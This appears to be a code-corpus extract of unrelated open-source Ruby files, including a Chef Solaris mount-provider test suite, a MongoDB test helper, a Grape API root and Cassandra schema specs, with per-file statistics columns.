5d328c2edc27da0130a75d660e3ddc2e6223743a | 23,219 | #
# Author:: Lamont Granquist (<[email protected]>)
# Copyright:: Copyright (c) 2008-2014 Chef Software, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'spec_helper'
require 'ostruct'
# Do not run these tests on windows because some path handling
# code is not implemented to handle windows paths.
describe Chef::Provider::Mount::Solaris, :unix_only do
let(:node) { Chef::Node.new }
let(:events) { Chef::EventDispatch::Dispatcher.new }
let(:run_context) { Chef::RunContext.new(node, {}, events) }
let(:device_type) { :device }
let(:fstype) { "ufs" }
let(:device) { "/dev/dsk/c0t2d0s7" }
let(:mountpoint) { "/mnt/foo" }
let(:options) { nil }
let(:new_resource) {
new_resource = Chef::Resource::Mount.new(mountpoint)
new_resource.device device
new_resource.device_type device_type
new_resource.fstype fstype
new_resource.options options
new_resource.supports :remount => false
new_resource
}
let(:provider) {
Chef::Provider::Mount::Solaris.new(new_resource, run_context)
}
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
#device device mount FS fsck mount mount
#to mount to fsck point type pass at boot options
#
fd - /dev/fd fd - no -
/proc - /proc proc - no -
# swap
/dev/dsk/c0t0d0s1 - - swap - no -
# root
/dev/dsk/c0t0d0s0 /dev/rdsk/c0t0d0s0 / ufs 1 no -
# tmpfs
swap - /tmp tmpfs - yes -
# nfs
cartman:/share2 - /cartman nfs - yes rw,soft
# ufs
/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
EOF
}
let(:vfstab_file) {
t = Tempfile.new("rspec-vfstab")
t.write(vfstab_file_contents)
t.close
t
}
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t0d0s0 on / type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200000 on Tue Jul 31 22:34:46 2012
/dev/dsk/c0t2d0s7 on /mnt/foo type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200007 on Tue Jul 31 22:34:46 2012
EOF
}
before do
stub_const("Chef::Provider::Mount::Solaris::VFSTAB", vfstab_file.path )
provider.stub(:shell_out!).with("mount -v").and_return(OpenStruct.new(:stdout => mount_output))
File.stub(:symlink?).with(device).and_return(false)
File.stub(:exist?).and_call_original # Tempfile.open on ruby 1.8.7 calls File.exist?
File.stub(:exist?).with(device).and_return(true)
File.stub(:exist?).with(mountpoint).and_return(true)
expect(File).to_not receive(:exists?)
end
describe "#define_resource_requirements" do
before do
# we're not testing the actual actions so stub them all out
[:mount_fs, :umount_fs, :remount_fs, :enable_fs, :disable_fs].each {|m| provider.stub(m) }
end
it "run_action(:mount) should raise an error if the device does not exist" do
File.stub(:exist?).with(device).and_return(false)
expect { provider.run_action(:mount) }.to raise_error(Chef::Exceptions::Mount)
end
it "run_action(:remount) should raise an error if the device does not exist" do
File.stub(:exist?).with(device).and_return(false)
expect { provider.run_action(:remount) }.to raise_error(Chef::Exceptions::Mount)
end
it "run_action(:mount) should raise an error if the mountpoint does not exist" do
File.stub(:exist?).with(mountpoint).and_return false
expect { provider.run_action(:mount) }.to raise_error(Chef::Exceptions::Mount)
end
it "run_action(:remount) should raise an error if the mountpoint does not exist" do
File.stub(:exist?).with(mountpoint).and_return false
expect { provider.run_action(:remount) }.to raise_error(Chef::Exceptions::Mount)
end
%w{tmpfs nfs ctfs proc mntfs objfs sharefs fd smbfs}.each do |ft|
context "when the device has a fstype of #{ft}" do
let(:fstype) { ft }
let(:device) { "something_that_is_not_a_file" }
before do
expect(File).to_not receive(:exist?).with(device)
end
it "run_action(:mount) should not raise an error" do
expect { provider.run_action(:mount) }.to_not raise_error
end
it "run_action(:remount) should not raise an error" do
expect { provider.run_action(:remount) }.to_not raise_error
end
end
end
end
describe "#load_current_resource" do
context "when loading a normal UFS filesystem" do
before do
provider.load_current_resource
end
it "should create a current_resource of type Chef::Resource::Mount" do
expect(provider.current_resource).to be_a(Chef::Resource::Mount)
end
it "should set the name on the current_resource" do
provider.current_resource.name.should == mountpoint
end
it "should set the mount_point on the current_resource" do
provider.current_resource.mount_point.should == mountpoint
end
it "should set the device on the current_resource" do
provider.current_resource.device.should == device
end
it "should set the device_type on the current_resource" do
provider.current_resource.device_type.should == device_type
end
it "should set the mounted status on the current_resource" do
expect(provider.current_resource.mounted).to be_true
end
it "should set the enabled status on the current_resource" do
expect(provider.current_resource.enabled).to be_true
end
it "should set the fstype field on the current_resource" do
expect(provider.current_resource.fstype).to eql("ufs")
end
it "should set the options field on the current_resource" do
expect(provider.current_resource.options).to eql(["-", "noauto"])
end
it "should set the pass field on the current_resource" do
expect(provider.current_resource.pass).to eql(2)
end
it "should not throw an exception when the device does not exist - CHEF-1565" do
File.stub(:exist?).with(device).and_return(false)
expect { provider.load_current_resource }.to_not raise_error
end
it "should not throw an exception when the mount point does not exist" do
File.stub(:exist?).with(mountpoint).and_return false
expect { provider.load_current_resource }.to_not raise_error
end
end
context "when the device is an smbfs mount" do
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
//solarsystem/tmp on /mnt type smbfs read/write/setuid/devices/dev=5080000 on Tue Mar 29 11:40:18 2011
EOF
}
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
//WORKGROUP;username:password@host/share - /mountpoint smbfs - no fileperms=0777,dirperms=0777
EOF
}
it "should work at some point in the future" do
pending "SMBFS mounts on solaris look like they will need some future code work and more investigation"
end
end
context "when the device is an NFS mount" do
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
cartman:/share2 on /cartman type nfs rsize=32768,wsize=32768,NFSv4,dev=4000004 on Tue Mar 29 11:40:18 2011
EOF
}
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
cartman:/share2 - /cartman nfs - yes rw,soft
EOF
}
let(:fstype) { "nfs" }
let(:device) { "cartman:/share2" }
let(:mountpoint) { "/cartman" }
before do
provider.load_current_resource
end
it "should set the name on the current_resource" do
provider.current_resource.name.should == mountpoint
end
it "should set the mount_point on the current_resource" do
provider.current_resource.mount_point.should == mountpoint
end
it "should set the device on the current_resource" do
provider.current_resource.device.should == device
end
it "should set the device_type on the current_resource" do
provider.current_resource.device_type.should == device_type
end
it "should set the mounted status on the current_resource" do
expect(provider.current_resource.mounted).to be_true
end
it "should set the enabled status on the current_resource" do
expect(provider.current_resource.enabled).to be_true
end
it "should set the fstype field on the current_resource" do
expect(provider.current_resource.fstype).to eql("nfs")
end
it "should set the options field on the current_resource" do
expect(provider.current_resource.options).to eql(["rw", "soft", "noauto"])
end
it "should set the pass field on the current_resource" do
# is this correct or should it be nil?
expect(provider.current_resource.pass).to eql(0)
end
end
context "when the device is symlink" do
let(:target) { "/dev/mapper/target" }
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
#{target} on /mnt/foo type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200007 on Tue Jul 31 22:34:46 2012
EOF
}
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
#{target} /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
EOF
}
before do
File.should_receive(:symlink?).with(device).at_least(:once).and_return(true)
File.should_receive(:readlink).with(device).at_least(:once).and_return(target)
provider.load_current_resource()
end
it "should set mounted true if the symlink target of the device is found in the mounts list" do
expect(provider.current_resource.mounted).to be_true
end
it "should set enabled true if the symlink target of the device is found in the vfstab" do
expect(provider.current_resource.enabled).to be_true
end
it "should have the correct mount options" do
expect(provider.current_resource.options).to eql(["-", "noauto"])
end
end
context "when the device is a relative symlink" do
let(:target) { "foo" }
let(:absolute_target) { File.expand_path(target, File.dirname(device)) }
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
#{absolute_target} on /mnt/foo type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200007 on Tue Jul 31 22:34:46 2012
EOF
}
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
#{absolute_target} /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
EOF
}
before do
File.should_receive(:symlink?).with(device).at_least(:once).and_return(true)
File.should_receive(:readlink).with(device).at_least(:once).and_return(target)
provider.load_current_resource()
end
it "should set mounted true if the symlink target of the device is found in the mounts list" do
expect(provider.current_resource.mounted).to be_true
end
it "should set enabled true if the symlink target of the device is found in the vfstab" do
expect(provider.current_resource.enabled).to be_true
end
it "should have the correct mount options" do
expect(provider.current_resource.options).to eql(["-", "noauto"])
end
end
context "when the matching mount point is last in the mounts list" do
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t0d0s0 on /mnt/foo type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200000 on Tue Jul 31 22:34:46 2012
/dev/dsk/c0t2d0s7 on /mnt/foo type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200007 on Tue Jul 31 22:34:46 2012
EOF
}
it "should set mounted true" do
provider.load_current_resource()
provider.current_resource.mounted.should be_true
end
end
context "when the matching mount point is not last in the mounts list" do
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t2d0s7 on /mnt/foo type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200007 on Tue Jul 31 22:34:46 2012
/dev/dsk/c0t0d0s0 on /mnt/foo type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200000 on Tue Jul 31 22:34:46 2012
EOF
}
it "should set mounted false" do
provider.load_current_resource()
provider.current_resource.mounted.should be_false
end
end
context "when the matching mount point is not in the mounts list (mountpoint wrong)" do
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t2d0s7 on /mnt/foob type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200007 on Tue Jul 31 22:34:46 2012
EOF
}
it "should set mounted false" do
provider.load_current_resource()
provider.current_resource.mounted.should be_false
end
end
context "when the matching mount point is not in the mounts list (raw device wrong)" do
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t2d0s72 on /mnt/foo type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200007 on Tue Jul 31 22:34:46 2012
EOF
}
it "should set mounted false" do
provider.load_current_resource()
provider.current_resource.mounted.should be_false
end
end
context "when the mount point is last in fstab" do
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t2d0s72 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
EOF
}
it "should set enabled to true" do
provider.load_current_resource
provider.current_resource.enabled.should be_true
end
end
context "when the mount point is not last in fstab and is a substring of another mount" do
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
/dev/dsk/c0t2d0s72 /dev/rdsk/c0t2d0s7 /mnt/foo/bar ufs 2 yes -
EOF
}
it "should set enabled to true" do
provider.load_current_resource
provider.current_resource.enabled.should be_true
end
end
context "when the mount point is not last in fstab" do
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
/dev/dsk/c0t2d0s72 /dev/rdsk/c0t2d0s72 /mnt/foo ufs 2 yes -
EOF
}
it "should set enabled to false" do
provider.load_current_resource
provider.current_resource.enabled.should be_false
end
end
context "when the mount point is not in fstab, but the mountpoint is a substring of one that is" do
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foob ufs 2 yes -
EOF
}
it "should set enabled to false" do
provider.load_current_resource
provider.current_resource.enabled.should be_false
end
end
context "when the mount point is not in fstab, but the device is a substring of one that is" do
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t2d0s72 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
EOF
}
it "should set enabled to false" do
provider.load_current_resource
provider.current_resource.enabled.should be_false
end
end
context "when the mountpoint line is commented out" do
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
#/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
EOF
}
it "should set enabled to false" do
provider.load_current_resource
provider.current_resource.enabled.should be_false
end
end
end
context "after the mount's state has been discovered" do
describe "mount_fs" do
it "should mount the filesystem" do
provider.should_receive(:shell_out!).with("mount -F #{fstype} -o defaults #{device} #{mountpoint}")
provider.mount_fs()
end
it "should mount the filesystem with options if options were passed" do
options = "logging,noatime,largefiles,nosuid,rw,quota"
new_resource.options(options.split(/,/))
provider.should_receive(:shell_out!).with("mount -F #{fstype} -o #{options} #{device} #{mountpoint}")
provider.mount_fs()
end
it "should delete the 'noauto' magic option" do
options = "rw,noauto"
new_resource.options(%w{rw noauto})
provider.should_receive(:shell_out!).with("mount -F #{fstype} -o rw #{device} #{mountpoint}")
provider.mount_fs()
end
end
describe "umount_fs" do
it "should umount the filesystem if it is mounted" do
provider.should_receive(:shell_out!).with("umount #{mountpoint}")
provider.umount_fs()
end
end
describe "remount_fs" do
it "should use mount -o remount" do
provider.should_receive(:shell_out!).with("mount -o remount #{new_resource.mount_point}")
provider.remount_fs
end
end
describe "when enabling the fs" do
context "in the typical case" do
let(:other_mount) { "/dev/dsk/c0t2d0s0 /dev/rdsk/c0t2d0s0 / ufs 2 yes -" }
let(:this_mount) { "/dev/dsk/c0t2d0s7\t-\t/mnt/foo\tufs\t2\tyes\tdefaults\n" }
let(:vfstab_file_contents) { [other_mount].join("\n") }
before do
provider.stub(:etc_tempfile).and_yield(Tempfile.open("vfstab"))
provider.load_current_resource
provider.enable_fs
end
it "should leave the other mountpoint alone" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(other_mount)}/)
end
it "should enable the mountpoint we care about" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(this_mount)}/)
end
end
context "when the mount has options=noauto" do
let(:other_mount) { "/dev/dsk/c0t2d0s0 /dev/rdsk/c0t2d0s0 / ufs 2 yes -" }
let(:this_mount) { "/dev/dsk/c0t2d0s7\t-\t/mnt/foo\tufs\t2\tno\t-\n" }
let(:options) { [ "noauto" ] }
let(:vfstab_file_contents) { [other_mount].join("\n") }
before do
provider.stub(:etc_tempfile).and_yield(Tempfile.open("vfstab"))
provider.load_current_resource
provider.enable_fs
end
it "should leave the other mountpoint alone" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(other_mount)}/)
end
it "should enable the mountpoint we care about" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(this_mount)}/)
end
end
end
describe "when disabling the fs" do
context "in the typical case" do
let(:other_mount) { "/dev/dsk/c0t2d0s0 /dev/rdsk/c0t2d0s0 / ufs 2 yes -" }
let(:this_mount) { "/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -" }
let(:vfstab_file_contents) { [other_mount, this_mount].join("\n") }
before do
provider.stub(:etc_tempfile).and_yield(Tempfile.open("vfstab"))
provider.disable_fs
end
it "should leave the other mountpoint alone" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(other_mount)}/)
end
it "should disable the mountpoint we care about" do
IO.read(vfstab_file.path).should_not match(/^#{Regexp.escape(this_mount)}/)
end
end
context "when there is a commented out line" do
let(:other_mount) { "/dev/dsk/c0t2d0s0 /dev/rdsk/c0t2d0s0 / ufs 2 yes -" }
let(:this_mount) { "/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -" }
let(:comment) { "#/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -" }
let(:vfstab_file_contents) { [other_mount, this_mount, comment].join("\n") }
before do
provider.stub(:etc_tempfile).and_yield(Tempfile.open("vfstab"))
provider.disable_fs
end
it "should leave the other mountpoint alone" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(other_mount)}/)
end
it "should disable the mountpoint we care about" do
IO.read(vfstab_file.path).should_not match(/^#{Regexp.escape(this_mount)}/)
end
it "should keep the comment" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(comment)}/)
end
end
context "when there is a duplicated line" do
let(:other_mount) { "/dev/dsk/c0t2d0s0 /dev/rdsk/c0t2d0s0 / ufs 2 yes -" }
let(:this_mount) { "/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -" }
let(:vfstab_file_contents) { [this_mount, other_mount, this_mount].join("\n") }
before do
provider.stub(:etc_tempfile).and_yield(Tempfile.open("vfstab"))
provider.disable_fs
end
it "should leave the other mountpoint alone" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(other_mount)}/)
end
it "should still match the duplicated mountpoint" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(this_mount)}/)
end
it "should have removed the last line" do
IO.read(vfstab_file.path).should eql( "#{this_mount}\n#{other_mount}\n" )
end
end
end
end
end
| 35.776579 | 141 | 0.617253 |
module RoleControl
  # Mixin that gives an object (the "actor") a fluent interface for
  # building authorization-scoped queries:
  #
  #   actor.do(:update).to(Resource).with_ids(ids).scope
  module Actor
    # Accumulates the pieces of a scoped query as the chained calls arrive.
    class DoChain
      attr_reader :scope, :action, :actor

      def initialize(actor, action)
        @actor  = actor
        @action = action
      end

      # Resolve the scope of +klass+ records the actor may perform the
      # action on, optionally merged with the class's `active` scope.
      def to(klass, context = {}, add_active_scope: true)
        @scope = klass.scope_for(action, actor, context)
        @scope = @scope.merge(klass.active) if add_active_scope && klass.respond_to?(:active)
        self
      end

      # Narrow the scope to the given ids (ordered by id); no-op when
      # +ids+ is blank.
      def with_ids(ids)
        return self if ids.blank?
        @scope = scope.where(id: ids).order(:id)
        self
      end
    end

    # Start a chain for +action+ with self as the actor.
    # NOTE(review): a supplied block is forwarded to DoChain.new, which
    # never yields it — confirm no caller relies on the block.
    def do(action, &block)
      DoChain.new(self, action, &block)
    end
  end
end
| 21.7 | 66 | 0.583717 |
33e7341a434f35bacc2a46576541f6da24b1f34c | 659 | #
# Copyright 2015, Noah Kantrowitz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Load the gem's RSpec support code and register it with the test suite.
require 'poise_ruby/spec_helper/helper'
PoiseRuby::SpecHelper::Helper.install
| 34.684211 | 74 | 0.772382 |
0185d50e809cf656d46f2a9f6524863e47d80e6a | 709 | require 'mongo'
Mongo::Logger.logger = Logger.new("./logs/mongo.log")
# Thin test-support wrapper around the Rocklov MongoDB collections.
class MongoDB
  attr_accessor :users, :equipos

  def initialize
    client = Mongo::Client.new("mongodb://rocklov-db:27017/rocklov")
    @users = client[:users]
    @equipos = client[:equipos]
  end

  # Delete every user registered with +email+.
  def remove_user(email)
    @users.delete_many({email: email})
  end

  # Return the BSON id of the user registered with +email+, or nil when
  # no such user exists. (Previously this crashed with NoMethodError on
  # a missing user because it indexed into a nil `first` result.)
  def get_user(email)
    user = @users.find({email: email}).first
    user && user[:_id]
  end

  # Delete every equipo named +name+ that belongs to the user +user_id+.
  def remove_equipo(name, user_id)
    obj_id = BSON::ObjectId.from_string(user_id)
    @equipos.delete_many({name: name, user: obj_id})
  end

  # Generate a fresh BSON ObjectId (useful for not-found scenarios).
  def get_mongo_id
    BSON::ObjectId.new
  end
end
| 18.179487 | 72 | 0.619182 |
e29c31a3a2d211416cd2b7b372406e55704d1eb4 | 469 | require "komachi_foundation/source"
require "thor"
module KomachiFoundation
  # Thor generator that copies a named template (file or directory tree)
  # from the registered source paths into the current project.
  class Generator < Thor::Group
    include Thor::Actions

    # All registered template source directories (memoized).
    def self.source_paths
      @_source_paths ||= Source.list
    end

    argument :file_name

    source_root File.expand_path('../templates', __FILE__)

    # Copy +file_name+ into the destination: directories are copied
    # recursively, single files are rendered through `template`.
    def copy_templates
      if File.directory?(find_in_source_paths(file_name))
        directory file_name
      else
        # Fixed: this was `elsif` with no condition, which evaluated
        # `template file_name` as a (discarded) condition expression
        # guarding an empty branch body.
        template file_name
      end
    end
  end
end
| 18.76 | 58 | 0.690832 |
e90a20e34e6dd1d8c4f98925d050fbab561a8cd1 | 1,253 | # Copyright (c) 2017 Salesforce
# Copyright (c) 2009 37signals, LLC
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# Storage key names under which Takwimu persists each metric family.
module Takwimu
  STATE    = 'takwimu.state'
  COUNTERS = 'takwimu.counters'
  GAUGES   = 'takwimu.gauges'
  TIMERS   = 'takwimu.timers'
end
| 46.407407 | 107 | 0.772546 |
edb1f2e7739849be1a0e8a2fb591342b869ee902 | 604 | Pod::Spec.new do |s|
s.name = 'TAKUUID'
s.version = '1.5.0'
s.license = 'MIT'
s.summary = 'create UUID and store to Keychain library'
s.homepage = 'https://github.com/taka0125/TAKUUID'
s.author = { 'Takahiro Ooishi' => '[email protected]' }
s.source = { :git => 'https://github.com/taka0125/TAKUUID.git', :tag => s.version.to_s }
s.requires_arc = true
s.platform = :ios, '6.0'
s.ios.deployment_target = '6.0'
s.ios.frameworks = 'Security'
s.public_header_files = 'Classes/*.h'
s.source_files = 'Classes/*.{h,m}'
end
| 33.555556 | 96 | 0.581126 |
f838b43ad6d065aeeb71aa18c93ecdf7df704935 | 142 | module Hydra::Derivatives
class VideoDerivatives < Runner
def self.processor_class
Processors::Video::Processor
end
end
end
| 17.75 | 34 | 0.732394 |
4a7f17bd0118229a9d255e6f4589ea01f1e1ff82 | 1,560 | require 'helpers/shared_helpers'
require 'swagger_docs'
module API
  module V1
    # Root API endpoints: landing document, node info, and swagger.json.
    class Root < Grape::API
      helpers SharedHelpers

      helpers do
        # Metadata communities hash with 'name => url' pairs.
        # Return: [Hash]
        #   { community1: 'url/for/comm1', ..., communityN : 'url/for/commN' }
        def metadata_communities
          communities = EnvelopeCommunity.pluck(:name).flat_map do |name|
            [name, url(name.dasherize)]
          end
          Hash[*communities]
        end
      end

      desc 'API root'
      get do
        {
          api_version: MetadataRegistry::VERSION,
          total_envelopes: Envelope.not_deleted.count,
          metadata_communities: metadata_communities,
          info: url(:info)
        }
      end

      desc 'Gives general info about the api node'
      get :info do
        {
          metadata_communities: metadata_communities,
          postman: 'https://www.getpostman.com/collections/bc38edc491333b643e23',
          swagger: url(:swagger, 'index.html'),
          readme: 'https://github.com/CredentialEngine/CredentialRegistry/blob/master/README.md',
          docs: 'https://github.com/CredentialEngine/CredentialRegistry/tree/master/docs'
        }
      end

      desc 'Render `swagger.json`'
      # Builds the swagger document from the Swagger::Blocks definitions
      # and injects the host of the current request.
      get ':swagger_json', requirements: { swagger_json: 'swagger.json' } do
        swagger_json = Swagger::Blocks.build_root_json [MR::SwaggerDocs]
        present swagger_json.merge(host: request.host_with_port)
      end
    end
  end
end
| 31.2 | 97 | 0.625 |
e802cf9f368a418b4dc211769530a9f861e6549c | 6,055 | require 'spec_helper'
describe 'cassandra::schema::table' do
context 'Create Table' do
let :facts do
{
operatingsystemmajrelease: 7,
osfamily: 'RedHat',
os: {
'family' => 'RedHat',
'name' => 'RedHat',
'release' => {
'full' => '7.6.1810',
'major' => '7',
'minor' => '6'
}
}
}
end
let(:title) { 'users' }
let(:params) do
{
use_scl: false,
scl_name: 'nodefault',
keyspace: 'Excelsior',
columns:
{
'userid' => 'text',
'username' => 'FROZEN<fullname>',
'emails' => 'set<text>',
'top_scores' => 'list<int>',
'todo' => 'map<timestamp, text>',
'COLLECTION-TYPE' => 'tuple<int, text,text>',
'PRIMARY KEY' => '(userid)'
},
options:
[
'COMPACT STORAGE',
'ID=\'5a1c395e-b41f-11e5-9f22-ba0be0483c18\''
]
}
end
it do
is_expected.to compile
is_expected.to contain_cassandra__schema__table('users')
read_command = '/usr/bin/cqlsh -e "DESC TABLE Excelsior.users" localhost 9042'
exec_command = '/usr/bin/cqlsh -e "CREATE TABLE IF NOT EXISTS Excelsior.users '
exec_command += '(userid text, username FROZEN<fullname>, emails set<text>, top_scores list<int>, '
exec_command += 'todo map<timestamp, text>, tuple<int, text,text>, PRIMARY KEY (userid)) '
exec_command += 'WITH COMPACT STORAGE AND ID=\'5a1c395e-b41f-11e5-9f22-ba0be0483c18\'" localhost 9042'
is_expected.to contain_exec(exec_command).
only_with(unless: read_command,
require: 'Exec[::cassandra::schema connection test]')
end
end
context 'Create Table with SCL' do
let :facts do
{
operatingsystemmajrelease: 7,
osfamily: 'RedHat',
os: {
'family' => 'RedHat',
'name' => 'RedHat',
'release' => {
'full' => '7.6.1810',
'major' => '7',
'minor' => '6'
}
}
}
end
let(:title) { 'users' }
let(:params) do
{
use_scl: true,
scl_name: 'testscl',
keyspace: 'Excelsior',
columns:
{
'userid' => 'text',
'username' => 'FROZEN<fullname>',
'emails' => 'set<text>',
'top_scores' => 'list<int>',
'todo' => 'map<timestamp, text>',
'COLLECTION-TYPE' => 'tuple<int, text,text>',
'PRIMARY KEY' => '(userid)'
},
options:
[
'COMPACT STORAGE',
'ID=\'5a1c395e-b41f-11e5-9f22-ba0be0483c18\''
]
}
end
it do
is_expected.to compile
is_expected.to contain_cassandra__schema__table('users')
read_command = '/usr/bin/scl enable testscl "/usr/bin/cqlsh -e \"DESC TABLE Excelsior.users\" localhost 9042"'
exec_command = '/usr/bin/scl enable testscl "/usr/bin/cqlsh -e \"CREATE TABLE IF NOT EXISTS Excelsior.users '
exec_command += '(userid text, username FROZEN<fullname>, emails set<text>, top_scores list<int>, '
exec_command += 'todo map<timestamp, text>, tuple<int, text,text>, PRIMARY KEY (userid)) '
exec_command += 'WITH COMPACT STORAGE AND ID=\'5a1c395e-b41f-11e5-9f22-ba0be0483c18\'\" localhost 9042"'
is_expected.to contain_exec(exec_command).
only_with(unless: read_command,
require: 'Exec[::cassandra::schema connection test]')
end
end
context 'Drop Table' do
let :facts do
{
operatingsystemmajrelease: 7,
osfamily: 'RedHat',
os: {
'family' => 'RedHat',
'name' => 'RedHat',
'release' => {
'full' => '7.6.1810',
'major' => '7',
'minor' => '6'
}
}
}
end
let(:title) { 'users' }
let(:params) do
{
use_scl: false,
scl_name: 'nodefault',
keyspace: 'Excelsior',
ensure: 'absent'
}
end
it do
is_expected.to compile
read_command = '/usr/bin/cqlsh -e "DESC TABLE Excelsior.users" localhost 9042'
exec_command = '/usr/bin/cqlsh -e "DROP TABLE IF EXISTS Excelsior.users" localhost 9042'
is_expected.to contain_exec(exec_command).
only_with(onlyif: read_command,
require: 'Exec[::cassandra::schema connection test]')
end
end
context 'Drop Table with SCL' do
let :facts do
{
operatingsystemmajrelease: 7,
osfamily: 'RedHat',
os: {
'family' => 'RedHat',
'release' => {
'full' => '7.6.1810',
'major' => '7',
'minor' => '6'
}
}
}
end
let(:title) { 'users' }
let(:params) do
{
use_scl: true,
scl_name: 'testscl',
keyspace: 'Excelsior',
ensure: 'absent'
}
end
it do
is_expected.to compile
read_command = '/usr/bin/scl enable testscl "/usr/bin/cqlsh -e \"DESC TABLE Excelsior.users\" localhost 9042"'
exec_command = '/usr/bin/scl enable testscl "/usr/bin/cqlsh -e \"DROP TABLE IF EXISTS Excelsior.users\" localhost 9042"'
is_expected.to contain_exec(exec_command).
only_with(onlyif: read_command,
require: 'Exec[::cassandra::schema connection test]')
end
end
context 'Set ensure to latest' do
let :facts do
{
operatingsystemmajrelease: 7,
osfamily: 'RedHat',
os: {
'family' => 'RedHat',
'name' => 'RedHat',
'release' => {
'full' => '7.6.1810',
'major' => '7',
'minor' => '6'
}
}
}
end
let(:title) { 'foobar' }
let(:params) do
{
ensure: 'latest'
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
end
| 27.775229 | 128 | 0.514121 |
# View helpers shared across the application: page titles, controlled
# vocabulary humanization, nil-safe time formatting, result summaries,
# search links, and truncation.
module ApplicationHelper
  include PresentersHelper

  TRUNCATE_CHARS_DEFAULT = 300

  # Accumulate page title segments across calls and render them joined
  # with ' | '. Blank segments are ignored.
  def page_title(title)
    @page_title ||= []
